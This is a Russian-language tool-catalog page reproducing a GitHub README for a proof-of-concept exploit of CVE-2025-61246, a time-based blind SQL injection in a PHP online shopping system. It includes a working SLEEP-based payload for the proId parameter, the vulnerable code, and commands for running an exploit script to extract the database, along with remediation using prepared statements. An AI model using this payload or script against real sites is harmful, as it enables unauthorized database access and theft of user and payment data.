Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-61246 — CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP | Kitploit
Инструменты/GitHubGitHub/hackergovind/cve-2025-61246
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubhackergovind/cve-2025-61246

CVE-2025-61246

CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-61246 - Уязвимость SQL-инъекции в системе онлайн-покупок

CVE Severity CVSS

Обзор

Этот репозиторий содержит Proof of Concept (PoC) для CVE-2025-61246 — критической уязвимости SQL-инъекции, обнаруженной в PHP-приложении системы онлайн-покупок. Уязвимость позволяет неаутентифицированному злоумышленнику выполнять произвольные SQL-команды с помощью временной слепой SQL-инъекции.

Детали уязвимости

  • CVE ID: CVE-2025-61246
  • Тип уязвимости: SQL-инъекция (временная слепая)
  • Затронутый компонент: /online-shopping-system-php-master/review_action.php
  • Затронутая версия: 1.0
  • Уязвимый параметр: proId
  • Вектор атаки: Сеть (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • Серьёзность: Критическая (CVSS Score: 9.8)
  • Обнаружил: Govind Pratap Singh

Техническое описание

Уязвимость существует в конечной точке review_action.php, где вводимые пользователем данные из параметра proId напрямую включаются в SQL-запросы без надлежащей санации или параметризованных запросов. Это позволяет злоумышленнику внедрять вредоносные SQL-нагрузки, которые могут:

  • Извлекать конфиденциальную информацию из базы данных
  • Обходить механизмы аутентификации
  • Изменять или удалять записи в базе данных
  • Выполнять административные операции

Пример уязвимого кода

root@kitploit:~
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);

Векторы атаки

Злоумышленник может воспользоваться этой уязвимостью следующим образом:

  1. Отправка поддельного POST-запроса к /online-shopping-system-php-master/review_action.php
  2. Включение вредоносной SQL-нагрузки в параметр proId
  3. Использование методов временной слепой SQL-инъекции для извлечения данных
  4. Использование уязвимости для получения несанкционированного доступа к базе данных

Пример нагрузки

root@kitploit:~
proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -

Proof of Concept

Этот репозиторий включает:

  1. Автоматизированный скрипт эксплуатации (exploit.py) — Python-скрипт для обнаружения и эксплуатации уязвимости
  2. Руководство по ручному тестированию (MANUAL_TESTING.md) — пошаговые инструкции для ручной эксплуатации
  3. Настройка уязвимого приложения (docker-compose.yml) — Docker-окружение для безопасного тестирования
  4. Руководство по устранению (REMEDIATION.md) — практики безопасного кодирования и патчи

Установка и использование

Предварительные требования

root@kitploit:~
Python 3.7+
pip install -r requirements.txt

Быстрый старт

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246

# Установка зависимостей
pip install -r requirements.txt

# Запуск эксплойта
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php

Расширенное использование

root@kitploit:~
# Только обнаружение (без эксплуатации)
python exploit.py --url http://target.com/review_action.php --detect-only

# Извлечение имени базы данных
python exploit.py --url http://target.com/review_action.php --extract-db

# Полная эксплуатация с настраиваемым таймаутом
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit

# Использование прокси для тестирования
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080

Влияние

Успешная эксплуатация этой уязвимости может привести к:

  • Утечке данных: Извлечение конфиденциальной информации пользователей, учётных данных и платёжных данных
  • Обход аутентификации: Несанкционированный доступ к административным функциям
  • Манипуляции с данными: Изменение или удаление критических записей в базе данных
  • Полная компрометация системы: Возможность удалённого выполнения кода в определённых конфигурациях

Устранение

Немедленные действия

  1. Применить проверку ввода: Внедрить строгую проверку всех данных, предоставленных пользователем
  2. Использовать параметризованные запросы: Заменить динамический SQL на подготовленные выражения
  3. Внедрить правила WAF: Развернуть правила брандмауэра веб-приложений для блокировки попыток SQL-инъекций
  4. Обновить приложение: Применить последние исправления безопасности

Пример безопасного кода

root@kitploit:~
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();

Подробные шаги по устранению см. в REMEDIATION.md.

Ссылки

  • OWASP SQL Injection
  • CWE-89: SQL Injection

Отказ от ответственности

⚠️ ВАЖНО: Данный PoC предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Автор не несёт ответственности за неправомерное использование этой информации. Всегда получайте соответствующие разрешения перед тестированием.

Автор

Govind Pratap Singh

  • GitHub: @hackergovind
  • Email: [email protected]
  • Medium: https://medium.com/@govindsinghpratap123

Лицензия

Этот проект распространяется под лицензией MIT — подробности см. в файле LICENSE.

Благодарности

  • Группа присвоения CVE MITRE
  • Фонд OWASP
  • Сообщество исследователей безопасности

Ответственное раскрытие: Если вы обнаружили уязвимость безопасности, пожалуйста, сообщите о ней ответственно вендору до публичного раскрытия.

Скачать инструмент